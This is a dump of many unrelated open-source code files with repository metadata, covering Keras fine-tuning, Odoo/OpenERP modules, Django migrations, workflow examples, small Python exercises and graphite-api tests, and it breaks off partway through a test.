answer = min(answer, solve(s, N, number))
s.pop()
if s[-1] != '+' and s[-1] != '-' and s[-1] != '*' and s[-1] != '/':
s.append('+')
answer = min(answer, solve(s, N, number))
s.pop()
s.append('-')
answer = min(answer, solve(s, N, number))
s.pop()
s.append('*')
answer = min(answer, solve(s, N, number))
s.pop()
s.append('/')
answer = min(answer, solve(s, N, number))
s.pop()
return answer
return answer
def solution(N, number):
answer = solve([str(N)], N, number)
return -1 if answer == 9 else answer
|
[
"[email protected]"
] | |
2edda813a68b94ffdf1c3d6201c1cff73d0ddad3
|
aaad70e69d37f92c160c07e4ca03de80becf2c51
|
/filesystem/usr/lib/python3.6/asyncio/base_events.py
|
32b4f0adcd1093409fe44dc22121f8affc046568
|
[] |
no_license
|
OSWatcher/ubuntu-server
|
9b4dcad9ced1bff52ec9cdb4f96d4bdba0ad3bb9
|
17cb333124c8d48cf47bb9cec1b4e1305626b17a
|
refs/heads/master
| 2023-02-10T18:39:43.682708 | 2020-12-26T01:02:54 | 2020-12-26T01:02:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 183 |
py
|
{
"MIME": "text/plain",
"inode_type": "REG",
"magic_type": "Python script, ASCII text executable",
"mode": "-rw-r--r--",
"sha1": "23f1c44c157099ef5d66c87ba91eb7128afa4867"
}
|
[
"[email protected]"
] | |
2ad7f8907bd282c066e9db3e2553e053f204e9a8
|
a70778e730f6d3e3be04ba449e6ed0a9ff7d7e6d
|
/classifier_5b_rough_fine_tune_from3z.py
|
4e132cf8513dd1cd901bd4a0c5a2f1a6c88b44fc
|
[] |
no_license
|
previtus/two_classes_ml
|
0351e62544cc46f9c09847de641fd84aac94d38b
|
0f780e2e3736e6280dddd25540911d60c9d721d8
|
refs/heads/master
| 2021-05-10T10:05:38.526602 | 2018-08-06T19:59:26 | 2018-08-06T19:59:26 | 118,946,345 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,192 |
py
|
img_size = None #(20,20)
img_size = (150,150)
epochs_first = 10
epochs_second = 40
batch_size = 16
validation_split = 0.3
RESCALE = 1. / 255 # put data from 0-255 into 0-1
# GET ALL DATA
# define the classes in here directly
from data_handling import LOAD_DATASET, LOAD_DATASET_VAL_LONGER_THR2, sample_random_subset_from_list, y_from_x
from data_handling import load_images_with_keras, convert_labels_to_int, convert_back_from_categorical_data, how_many_are_in_each_category
TRAIN_WITH_LONGER_THAN = 1000
TRAIN_C_balanced = 5000
SPLIT = 0.3 # 70% and 30%
FOLDER = 'chillan_saved_images_square_224_ALL_with_len'
folders = ['data/'+FOLDER+'/LP/', 'data/'+FOLDER+'/TR/', 'data/'+FOLDER+'/VT/']
VAL_ONLY_LONGER_THR2 = 1000
BalancedVal = False
StillBalance10to1to1 = True
X_TRAIN_BAL, X_VAL_FULL = LOAD_DATASET_VAL_LONGER_THR2(
TRAIN_WITH_LONGER_THAN, TRAIN_C_balanced, SPLIT, FOLDER, folders, VAL_ONLY_LONGER_THR2,
BalancedVal=BalancedVal,StillBalance10to1to1 = StillBalance10to1to1)
specialname = '__Finetuned'
classes_names = ['LP', 'TR', 'VT']
num_classes = len(classes_names)
labels_texts = classes_names
labels = [0, 1, 2]
DROP=0.2
SUBSET_FOR_TRAIN = 8000
SUBSET_FOR_VAL = 8000
############ Whats bellow doesn't have to be changed dramatically
X_TRAIN_BAL,_ = sample_random_subset_from_list(X_TRAIN_BAL, SUBSET_FOR_TRAIN)
Y_TRAIN_BAL = y_from_x(X_TRAIN_BAL)
X_VAL,_ = sample_random_subset_from_list(X_VAL_FULL, SUBSET_FOR_VAL)
Y_VAL = y_from_x(X_VAL)
from keras.preprocessing.image import load_img, img_to_array
import numpy as np
import keras
from matplotlib import pyplot as plt
print("Loading image data!")
# X_TRAIN_BAL, Y_TRAIN_BAL
x_train = load_images_with_keras(X_TRAIN_BAL, target_size=img_size)
y_train = convert_labels_to_int(Y_TRAIN_BAL, classes_names, labels)
y_train = keras.utils.to_categorical(y_train, num_classes=num_classes)
# X_VAL, Y_VAL
x_test = load_images_with_keras(X_VAL, target_size=img_size)
y_test = convert_labels_to_int(Y_VAL, classes_names, labels)
y_test = keras.utils.to_categorical(y_test, num_classes=num_classes)
print("x_train:", x_train.shape)
print("y_train:", y_train.shape)#, y_train[0:10])
print("x_test:", x_test.shape)
print("y_test:", y_test.shape)#, y_test[0:10])
print("---")
print("SanityCheck Test dist:")
how_many_are_in_each_category(convert_back_from_categorical_data(y_test))
print("SanityCheck Train dist:")
how_many_are_in_each_category(convert_back_from_categorical_data(y_train))
print("---")
x_train *= RESCALE
x_test *= RESCALE
# =============================
# ==============================================================================
# ==============================================================================
# ==============================================================================
# ==============================================================================
# ROUGH
from keras import optimizers
from keras.applications import VGG16
vgg_conv = VGG16(weights='imagenet', include_top=False, input_shape=(img_size[0], img_size[1], 3))
print("calculating high lvl features...")
X_bottleneck_train = vgg_conv.predict(x_train)
X_bottleneck_test = vgg_conv.predict(x_test)
print("X_bottleneck_train:", X_bottleneck_train.shape)
print("y_test:", y_train.shape)#, y_train[0:10])
print("X_bottleneck_test:", X_bottleneck_test.shape)
print("y_test:", y_test.shape)#, y_test[0:10])
print("---")
print("train_data.shape[1:]", X_bottleneck_train.shape[1:])
from keras.models import Sequential
from keras.layers import Dropout, Flatten, Dense
classifier_model = Sequential()
classifier_model.add(Flatten(input_shape=X_bottleneck_train.shape[1:]))
classifier_model.add(Dense(256, activation='relu'))
classifier_model.add(Dropout(0.5))
classifier_model.add(Dense(num_classes, activation='sigmoid'))
print("FIRST ROUGH MODEL:")
classifier_model.summary()
#classifier_model.compile(loss='categorical_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4),metrics=['accuracy'])
classifier_model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])
# ==============================================================================
# TRAIN 1
# ==============================================================================
#
history1 = classifier_model.fit(X_bottleneck_train, y_train,
batch_size=batch_size,
epochs=epochs_first,
validation_data=(X_bottleneck_test, y_test),
verbose=1)
# Works well, gets us till cca 96% even in 10 epochs (possibly even 5)
# ==============================================================================
# ==============================================================================
# Freeze the layers except the last 4 layers
for layer in vgg_conv.layers[:-4]:
layer.trainable = False
# Check the trainable status of the individual layers
for layer in vgg_conv.layers:
print(layer, layer.trainable)
from keras import models
from keras import layers
# Create the model
fine_model = models.Sequential()
fine_model.add(vgg_conv)
fine_model.add(classifier_model)
print("SECOND FINE MODEL:")
fine_model.summary()
# Compile the model
# TRY other?
#fine_model.compile(loss='categorical_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4),metrics=['accuracy'])
# clip norm didnt help with loss: nan
#fine_model.compile(loss='categorical_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4, clipnorm=1.),metrics=['accuracy'])
#model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy']) # default lr lr=0.001
# TRY
sgd = optimizers.SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)
fine_model.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=['accuracy'])
# ==============================================================================
# TRAIN 2
# ==============================================================================
#
history2 = fine_model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs_second,
validation_data=(x_test, y_test),
verbose=1)
# Whoops, sudden drop to loss: nan
# ==============================================================================
# REPORT
# ==============================================================================
#
#print(history1.history)
#print(history2.history)
split_n = len(history1.history['val_loss'])
# val_loss', 'val_acc', 'loss', 'acc
history1.history['val_loss'] += history2.history['val_loss']
history1.history['val_acc'] += history2.history['val_acc']
history1.history['loss'] += history2.history['loss']
history1.history['acc'] += history2.history['acc']
from visualize_history import visualize_history
plt = visualize_history(history1.history, show_also='acc', show=False, save=False)
#visualize_history(history2.history, show_also='acc', save=False, save_path='classifier5b_'+str(epochs)+'epochs_')
plt.axvline(x=split_n-0.5, linestyle='dashed', color='black')
filename = 'classifier5b_CHILL_'+str(epochs_first)+'+'+str(epochs_second)+'epochs_'
plt.savefig(filename)
plt.show()
fine_model.save('5b_final_fine_model.h5')
|
[
"[email protected]"
] | |
8871896d5379ec5750e6fb6433622c846811c30b
|
b8fed8222b41e447cd5ce83513eb4d014c01742b
|
/ad_report_salesadmin/po/po_form.py
|
ae2a831ae88665d254b25eafbddb16d0e61cf761
|
[] |
no_license
|
lajayuhniyarsyah/ERP-Supra
|
e993d8face6e022b6f863d1dff7cb51cda36be8d
|
5a64dbb57ee40070354926700091fb9025c1350c
|
refs/heads/master
| 2021-01-25T22:09:46.306990 | 2017-11-08T05:32:04 | 2017-11-08T05:32:04 | 23,605,825 | 0 | 10 | null | 2017-11-08T05:32:05 | 2014-09-03T03:58:28 |
Python
|
UTF-8
|
Python
| false | false | 2,035 |
py
|
import time
from report import report_sxw
from osv import osv,fields
from report.render import render
#from ad_num2word_id import num2word
import pooler
#from report_tools import pdf_fill,pdf_merge
from tools.translate import _
import tools
from tools.translate import _
import decimal_precision as dp
#from ad_amount2text_idr import amount_to_text_id
from tools import amount_to_text_en
class po_form(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(invoice_form, self).__init__(cr, uid, name, context=context)
#if self.pool.get('sale.order').browse(cr, uid, context['active_ids'])[0].state <> 'approved':
# raise osv.except_osv(_('Can not Print PO Form !'), _('You can not Print PO Form If State not Approved'))
#
# self.line_no = 0
self.localcontext.update({
'get_object':self._get_object,
# 'time': time,
# 'convert':self.convert,
# 'get_company_address': self._get_company_address,
# #'angka':self.angka,
## 'alamat': self.alamat_npwp,
# 'convert':self.convert,
# 'charge':self.charge,
## 'nourut': self.no_urut,
## 'get_ppn': self.get_ppn,
# 'line_no':self._line_no,
# 'blank_line':self.blank_line,
# 'blank_line_rfq':self.blank_line_rfq,
# 'get_grand_total':self.get_grand_total,
# 'get_internal':self._get_internal,
# 'sum_tax':self._sum_tax,
# 'get_curr2':self.get_curr,
# 'get_invoice':self._get_invoice,
# 'get_curr':self._get_used_currency,
})
def _get_object(self,data):
obj_data=self.pool.get(data['model']).browse(self.cr,self.uid,[data['id']])
# seq=obj_data[0].print_seq
# seq+=1
# obj_data[0].write({'print_seq':seq})
return obj_data
report_sxw.report_sxw('report.po.form', 'purchase.order', 'ad_report_salesadmin/po/po_form.mako', parser=po_form,header=False)
|
[
"[email protected]"
] | |
f040cc2c3bcc0b27174802337d61601ed34c13a6
|
38c1e589388752100c4afcbe0b445bfff033bab2
|
/friend/migrations/0003_auto_20200819_1444.py
|
0bf415da2081910e1e2d42a9465ac80b351f2e6a
|
[] |
no_license
|
ruhullahil/Codingwithmitch-Chat
|
02c83f17fd51329fb3e4c0af74f1890ffd7ac012
|
dd854e6357e98684c3fe7c87da028de1f356030b
|
refs/heads/master
| 2023-01-03T00:38:38.225127 | 2020-10-29T21:09:37 | 2020-10-29T21:09:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 538 |
py
|
# Generated by Django 2.2.15 on 2020-08-19 21:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('friend', '0002_auto_20200819_1443'),
]
operations = [
migrations.AlterField(
model_name='friendlist',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL),
),
]
|
[
"[email protected]"
] | |
7c3de6ac23a5796d7675e6ed3bf8151de5a1c8c6
|
a6b6294dd573e7a8429f6e1817a0598c7b315c5e
|
/examples/finance_vix.py
|
d0a1e8139e68366c05b1e389003532561c2be261
|
[
"MIT"
] |
permissive
|
openknowledge-archive/datapackage-bigquery-py
|
4bef9c960c4efc9131d4673fab1f999f5ae09221
|
f1d822a1846eac4cfcdfd0f9e94bc27d2458f00b
|
refs/heads/master
| 2021-05-31T09:52:09.884572 | 2016-01-30T16:23:02 | 2016-01-30T16:23:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 577 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import sys
from pprint import pprint
sys.path.insert(0, '.')
from examples.base import run
# Fixtures
dataset = 'datapackage'
prefix = 'finance_vix_%s_%s_' % (sys.version_info.major, sys.version_info.minor)
source = 'examples/packages/finance-vix/datapackage.json'
target = 'tmp/packages/finance-vix/datapackage.json'
# Execution
if __name__ == '__main__':
run(dataset, prefix, source, target)
|
[
"[email protected]"
] | |
8a7d55caa81a5c81fa616f5f2ed3c6f0142efd0a
|
69bc23a7baf65b276496d76d02645b5a76cfe083
|
/thu_python_16/program3.py
|
f3332c8639d67bd315206d183acabe04cb6c234d
|
[] |
no_license
|
pylinx64/thu_python_16
|
a12e4ec8f82e6470b496116342b777e0a6676be1
|
617e75618a5a3117ec34278c41dadb38aa39fdb8
|
refs/heads/main
| 2023-04-23T03:17:31.347867 | 2021-05-05T10:09:57 | 2021-05-05T10:09:57 | 336,022,469 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 568 |
py
|
#x=10
#print(x)
#y=10
#print(x+y)
#print('x+y')
#x=20
#z = 10
#print(x+y+z)
#x='Яготинское'
#k='молоко'
#print(x+' '+k)
#print('Яготинское'+' молоко')
#print(k * 143543543)
#print(11 > 10)
#print(8 > 9)
#print(9 != 9)
#print(9 == 9)
#x = 8
#y = 9
#print(x >= y)
#print('a' == 'a')
#print('с' == 'c')
#print('z' > 'a')
password = input('Введите пароль: ')
if 'abc123' == password:
print('Вход выполнен')
else:
print('Невход выполнен 404')
|
[
"[email protected]"
] | |
d073cf0e510babb4c2329508f3b0d549e0cf3cec
|
0bc2a2963cb72c09c0ec0b3e3b10911c7bc31342
|
/examples/manila/script.py
|
a5f6b5d55011b15a3bcca5fbe09c09f48968cb7b
|
[] |
no_license
|
cloudify-cosmo/cloudify-openstack-plugin
|
eb5730d0b75442e6a49069164fde03020dcca1de
|
7d2cd4162897333adcaab4bd83361bbd369fcf17
|
refs/heads/master
| 2023-09-06T09:10:53.372638 | 2023-03-06T15:02:59 | 2023-03-06T15:02:59 | 18,327,738 | 19 | 75 | null | 2023-03-06T15:03:01 | 2014-04-01T11:52:24 |
Python
|
UTF-8
|
Python
| false | false | 391 |
py
|
# For development help:
from manilaclient import client
# Fill in with real values.
manila = client.Client(
client_version='2',
username='admin',
password='openstack',
project_name='demo',
auth_url='http://10.11.12.2/identity',
user_domain_name='Default',
project_domain_name='default')
share_networks = manila.share_networks.list()
shares = manila.shares.list()
|
[
"[email protected]"
] | |
dd30c5254405af64ce994ba786c148924ddf521c
|
fd0194543a142c63812352e79c417e54a19d0cd5
|
/Auxiliary_Scripts/Plot_Relocate.py
|
7633b63d02c80b1e30093bd97aeca0eb93c5d1b2
|
[] |
no_license
|
mwilensky768/MJW-MWA
|
2ac85b8f07577e3112c418595bf62902d720c3c2
|
ebda1e273a401c88f014bc698743547ec86a6f35
|
refs/heads/master
| 2021-05-02T00:51:48.591198 | 2021-03-31T22:34:06 | 2021-03-31T22:34:06 | 78,403,875 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 324 |
py
|
import glob
import shutil
import os
plot_dir = '/Users/mike_e_dubs/MWA/Catalogs/Wenyang_Phase2/data_eva/unflagged/'
target_dir = '/Users/mike_e_dubs/MWA/Catalogs/Wenyang_Phase2/data_eva/frac_diff/'
plots = glob.glob('%s*__INS_frac_diff.png' % (plot_dir))
print(plots)
for plot in plots:
shutil.copy(plot, target_dir)
|
[
"[email protected]"
] | |
344513f40b84e70156a271a556a0a7afa60bb84b
|
6febc1719503d0f9dbc97f6b1202116370391b10
|
/public_holiday/models/hr_holidays_inherited_model.py
|
fa5c2a57f2e8a69880f076eb808b1dbb72e214ac
|
[] |
no_license
|
arshakil/Odoo-Development
|
5c6a1795cd64a8ebef5abfdf7d6245804594bcd8
|
df37f6e8c2f7d89cdbdb36d0a8fd501ef8bfe563
|
refs/heads/master
| 2022-12-11T05:17:12.123339 | 2020-07-28T07:38:58 | 2020-07-28T07:38:58 | 248,154,189 | 0 | 2 | null | 2022-12-08T03:51:50 | 2020-03-18T06:20:59 |
Python
|
UTF-8
|
Python
| false | false | 3,029 |
py
|
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError
from datetime import date, datetime
from datetime import datetime, timedelta
class Hr_Holidays_inherited_Model(models.Model):
_inherit = 'hr.holidays'
public_holiday=fields.Float(string='Public Holiday In Between',compute='check_public_holiday')
@api.model
def create(self, vals):
holiday_status_id=vals['holiday_status_id']
# print ("vals date_from",vals['date_from'])
# print ('state', vals['state'])
# print ('holiday_status_id is called',holiday_status_id)
if vals['type'] == 'remove':
Is_check_hr_holidays_status= self.env['hr.holidays.status'].search([('id','=',holiday_status_id),('exclude_public_holidays','=',True)])
if Is_check_hr_holidays_status:
if vals['date_from'] and vals['date_to']:
count = 0;
start_date = datetime.strptime(vals['date_from'], '%Y-%m-%d %H:%M:%S').date()
end_date = datetime.strptime(vals['date_to'], '%Y-%m-%d %H:%M:%S').date()
range_of_dates = [start_date + timedelta(days=x) for x in range((end_date - start_date).days + 1)]
for public_holiday_date in range_of_dates:
check_public_holidays = self.env['public_holiday.public_holiday'].search([])
for pub_holiday in check_public_holidays:
if str(public_holiday_date)==pub_holiday.start:
count+=1
else:
pass
set_count=vals['number_of_days_temp']-float(count)
if vals['number_of_days_temp']<1:
vals['number_of_days_temp']=0
vals['public_holiday']=0
else:
vals['number_of_days_temp']=set_count
vals['public_holiday'] = float(count)
return super(Hr_Holidays_inherited_Model, self).create(vals)
else:
return super(Hr_Holidays_inherited_Model, self).create(vals)
@api.depends('date_from', 'date_to')
def check_public_holiday(self):
if self.date_from and self.date_to:
count = 0;
start_date = datetime.strptime(self.date_from, '%Y-%m-%d %H:%M:%S').date()
end_date = datetime.strptime(self.date_to, '%Y-%m-%d %H:%M:%S').date()
range_of_dates = [start_date + timedelta(days=x) for x in range((end_date - start_date).days + 1)]
for public_holiday_date in range_of_dates:
check_public_holidays = self.env['public_holiday.public_holiday'].search([])
for pub_holiday in check_public_holidays:
if str(public_holiday_date) == pub_holiday.start:
count += 1
else:
pass
self.public_holiday=count
|
[
"[email protected]"
] | |
e938435982e4bca35a3bbaf1e7c4c35be18545a9
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/182/usersdata/265/105453/submittedfiles/diagonaldominante.py
|
2a3603de9bfd26bb77e24473ed3f5a3d2574df4e
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 500 |
py
|
# -*- coding: utf-8 -*-
import numpy as np
def soma(A):
somalinhas=[]
for i in range (0,A.shape[0],1):
cont=0
for j in range (0,A,shape[1],1):
cont=cont+a[i,j]
somalinhas.append(cont)
return(somalinhas)
linhas=int(input('digite a quantidade de linhas: '))
a=np.zeros((linhas,linhas))
for i in range (0,a.shape[0],1):
for j in range (0,a.shape[1],1):
a[i,j]=float(input('digite os valores da matriz: '))
print(a)
print(diagonal(linhas))
|
[
"[email protected]"
] | |
7e1ccc3c0c0d628fe5629e0ba6ef33d3b0101291
|
bf0ecad5f2d9853944e6bbc1ab6160359e9a6803
|
/blog/migrations/0001_initial.py
|
d30bdf5599f3883def76510678e4cb1d43d9f3c0
|
[] |
no_license
|
NiteshPidiparars/icoder-blog-post
|
9addc53a83ec916c421ee16de7b04b8035be5d6b
|
19c5a333faf520b4133a0fa5d5ccf37320ed4181
|
refs/heads/master
| 2023-05-28T01:41:11.114065 | 2021-06-16T07:05:48 | 2021-06-16T07:05:48 | 374,288,121 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 683 |
py
|
# Generated by Django 3.2.4 on 2021-06-04 06:36
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('sno', models.AutoField(primary_key=True, serialize=False)),
('title', models.CharField(max_length=255)),
('author', models.CharField(max_length=14)),
('slug', models.CharField(max_length=130)),
('timeStamp', models.DateTimeField(blank=True)),
('content', models.TextField()),
],
),
]
|
[
"[email protected]"
] | |
dde36e2eae98fd6ebba3dc430abdd47affdd0f65
|
a3e7583b70584f62554c5969a9963ba79afd7ac3
|
/check.py
|
b7630edc09bab8c7a639472f47604386f4a53a32
|
[
"MIT"
] |
permissive
|
foamliu/DeepRankIQA
|
4f677a2fe1912b16cf4bbcc05c8571d46260711f
|
7801cb4ff2c934a9d954ace9ad52600f96396125
|
refs/heads/master
| 2020-09-03T06:02:05.896210 | 2019-11-05T01:30:27 | 2019-11-05T01:30:27 | 219,402,631 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 717 |
py
|
import os
import pickle
import cv2 as cv
from tqdm import tqdm
from config import data_file, image_folder
if __name__ == "__main__":
with open(data_file, 'rb') as f:
samples = pickle.load(f)
filenames = set()
for sample in tqdm(samples):
before = sample['before']
fullpath = os.path.join(image_folder, before)
img = cv.imread(fullpath)
assert (img is not None)
filenames.add(before)
after = sample['after']
fullpath = os.path.join(image_folder, before)
img = cv.imread(fullpath)
assert (img is not None)
filenames.add(after)
num_samples = len(list(filenames))
print('num_samples: ' + str(num_samples))
|
[
"[email protected]"
] | |
478dec05c29f554e8d1effc63ad7264f99e95538
|
c236e0c3b34a81e75acb9591423b6aad9d6a22dd
|
/unitTestRunner.py
|
451a956edaed0cee0386f60f3b60470f1b9a6a7c
|
[] |
no_license
|
abhijeetdtu/heimcharge
|
2cd68c9eaaf5b94206d310c8b8348133b5d4e77b
|
569a9d22916808ba8b67169a2822a91e05a051e9
|
refs/heads/master
| 2021-06-06T02:55:29.913134 | 2019-06-11T03:07:20 | 2019-06-11T03:07:20 | 131,433,168 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
import unittest
from UnitTests.ChartPlotTest import *
from UnitTests.GeoOpsTest import *
from UnitTests.FileOpsTest import *
if __name__ == '__main__':
unittest.main(exit=False)
|
[
"[email protected]"
] | |
b23143408eae95819c6760c853c06db075ea9987
|
d62e01ee1b50b8228d25736daceae0e822f3a0a0
|
/examples/user_guide/add_tasks.py
|
e323c771d0a918d6b08a4f1fc852134d93c6e40d
|
[
"MIT"
] |
permissive
|
dalg24/radical.entk
|
b6f34ae1b2075f638fbdfd5fc397ea4c0d87cb93
|
4aa68d8de7804e09ca64629035ccda0b79ac0b76
|
refs/heads/master
| 2020-04-03T17:25:37.548618 | 2018-10-16T12:06:30 | 2018-10-16T12:06:30 | 155,444,172 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,916 |
py
|
from radical.entk import Pipeline, Stage, Task, AppManager
import os
# ------------------------------------------------------------------------------
# Set default verbosity
if os.environ.get('RADICAL_ENTK_VERBOSE') == None:
os.environ['RADICAL_ENTK_REPORT'] = 'True'
# Description of how the RabbitMQ process is accessible
# No need to change/set any variables if you installed RabbitMQ has a system
# process. If you are running RabbitMQ under a docker container or another
# VM, set "RMQ_HOSTNAME" and "RMQ_PORT" in the session where you are running
# this script.
hostname = os.environ.get('RMQ_HOSTNAME', 'localhost')
port = os.environ.get('RMQ_PORT', 5672)
if __name__ == '__main__':
# Create a Pipeline object
p = Pipeline()
# Create a Stage object
s = Stage()
for cnt in range(10):
# Create a Task object
t = Task()
t.name = 'my-task' # Assign a name to the task (optional, do not use ',' or '_')
t.executable = ['/bin/echo'] # Assign executable to the task
t.arguments = ['I am task %s'%cnt] # Assign arguments for the task executable
# Add the Task to the Stage
s.add_tasks(t)
# Add Stage to the Pipeline
p.add_stages(s)
# Create Application Manager
appman = AppManager(hostname=hostname, port=port)
# Create a dictionary describe four mandatory keys:
# resource, walltime, and cpus
# resource is 'local.localhost' to execute locally
res_dict = {
'resource': 'local.localhost',
'walltime': 10,
'cpus': 1
}
# Assign resource request description to the Application Manager
appman.resource_desc = res_dict
# Assign the workflow as a set or list of Pipelines to the Application Manager
# Note: The list order is not guaranteed to be preserved
appman.workflow = set([p])
# Run the Application Manager
appman.run()
|
[
"[email protected]"
] | |
190402e6dd636bf2f4fa9578042f043ce51c8530
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/wtBko8Bc8o8Tmra3q_11.py
|
93df75889df3f71ae56c4f1e24530b81e184ba11
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
def halflife_calculator(mass, hlife, n):
mass_left = mass/(2**n)
years = hlife * n
return [round(mass_left,3),years]
|
[
"[email protected]"
] | |
008880df49eaa648acea8a9abf9ffaa149112098
|
85c0813d837b0e0f189020a52348db1deffb0b11
|
/public/db/coupon_db.py
|
80daaa213acc609f25eb27d5f2237e1696469652
|
[] |
no_license
|
reb00t2018/flask-reptiles
|
2d49fb27e718e305a7127e05047d865a1e7a6157
|
ac3832340219f922e3b9451c2e2b1e18773938c1
|
refs/heads/master
| 2020-07-03T03:05:56.991764 | 2019-06-11T01:19:14 | 2019-06-11T01:19:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,051 |
py
|
# -*- coding: utf-8 -*-
__author__ = 'Apple'
from public.db.participle_db import DataBase_PD
class CouponDB(DataBase_PD):
def __init__(self):
super(CouponDB, self).__init__()
def save_coupon(self, coupon):
'''
保存一条商品信息到数据库
:param coupon:
:return:
'''
insert_sql = """
(insert into goods_goods(category_id,second_id,first_id,title, price, url, pic, brand,goods_desc,add_time)
values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s))
"""
old_coupon = self.is_has_by_name(coupon.title)
insert_data = (
coupon.category_id,coupon.second_id,coupon.first_id, coupon.title, coupon.price, coupon.url, coupon.pic
, coupon.brand,coupon.goods_desc,coupon.add_time
)
if not old_coupon:
return self.execute(insert_sql, insert_data)
else:
return False
def is_has_by_name(self,title):
'''
根据name查询是否有这个商品
:param title:
:return:
'''
sql = """
select 1 from goods_goods where title = %s
"""
return self.find_execute(sql, (title))
def save_ip(self,ip,time):
insert_sql = """
insert into goods_getip(ip,add_time) values (%s,%s)
"""
return self.execute(insert_sql, (ip,time))
def count_ip(self):
select_sql = """
select count(*) from goods_getip
"""
return self.find_execute(select_sql)
def delete_ip(self,getip):
delete_sql = """
DELETE FROM goods_getip WHERE id = {0}
"""
return self.execute(delete_sql.format(getip))
def sumip(self):
select_sql = """
select * from goods_getip
"""
return self.find_execute(select_sql,fetchone=False)
|
[
"[email protected]"
] | |
44c569b36803775a0c36187b8503777aef16b0ec
|
fa7790c45dbc1ee804011e9dff2d4ff424b9f3d6
|
/Searching and Sorting/Counting sort/Implementation.py
|
63a5b8f34c85215b5c59e2ea21c34fde374752dc
|
[] |
no_license
|
KuroKousuii/Algorithms
|
bcdf75e58e20287e3162ef3302f8051604d7b7d6
|
3bf0250780c9d11c69546ca0da130fbbcada7e40
|
refs/heads/main
| 2023-05-31T07:41:07.399881 | 2021-06-16T09:32:16 | 2021-06-16T09:32:16 | 368,274,761 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,177 |
py
|
# Python program for counting sort
# The main function that sort the given string arr[] in
# alphabetical order
def countSort(arr):
# The output character array that will have sorted arr
output = [0 for i in range(len(arr))]
# Create a count array to store count of inidividul
# characters and initialize count array as 0
count = [0 for i in range(256)]
# For storing the resulting answer since the
# string is immutable
ans = ["" for _ in arr]
# Store count of each character
for i in arr:
count[ord(i)] += 1
# Change count[i] so that count[i] now contains actual
# position of this character in output array
for i in range(256):
count[i] += count[i - 1]
# Build the output character array
for i in range(len(arr)):
output[count[ord(arr[i])] - 1] = arr[i]
count[ord(arr[i])] -= 1
# Copy the output array to arr, so that arr now
# contains sorted characters
for i in range(len(arr)):
ans[i] = output[i]
return ans
# Driver program to test above function
arr = "geeksforgeeks"
ans = countSort(arr)
print("Sorted character array is % s" % ("".join(ans)))
|
[
"[email protected]"
] | |
11c74340ab82e472305fd10a2cd5370c1dea9ffb
|
fb1a7534356941e763755838e9b06fede7a7d116
|
/tests/test_metrics.py
|
46fe3e1aeab2e0aed220e08069a18e20c0547717
|
[
"Apache-2.0"
] |
permissive
|
torkelo/graphite-api
|
e2417f0bddae9bcd0581272dc270bbe08a78d653
|
0fd1904b462c1cbbe99f531a365839647a01a7e1
|
refs/heads/master
| 2020-12-02T15:08:56.573796 | 2014-03-17T21:59:38 | 2014-03-17T21:59:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,363 |
py
|
import os.path
import whisper
from . import TestCase, WHISPER_DIR
class MetricsTests(TestCase):
def _create_dbs(self):
for db in (
('test', 'foo.wsp'),
('test', 'bar', 'baz.wsp'),
):
db_path = os.path.join(WHISPER_DIR, *db)
os.makedirs(os.path.dirname(db_path))
whisper.create(db_path, [(1, 60)])
def test_find(self):
url = '/metrics/find'
response = self.app.get(url)
self.assertEqual(response.status_code, 400)
response = self.app.get(url, query_string={'query': 'test'})
self.assertJSON(response, [])
response = self.app.get(url, query_string={'query': 'test',
'format': 'completer'})
self.assertJSON(response, {'metrics': []})
self._create_dbs()
response = self.app.get(url, query_string={'query': 'test.*',
'format': 'treejson'})
self.assertJSON(response, [{
'allowChildren': 1,
'expandable': 1,
'id': 'test.bar',
'leaf': 0,
'text': 'bar',
}, {
'allowChildren': 0,
'expandable': 0,
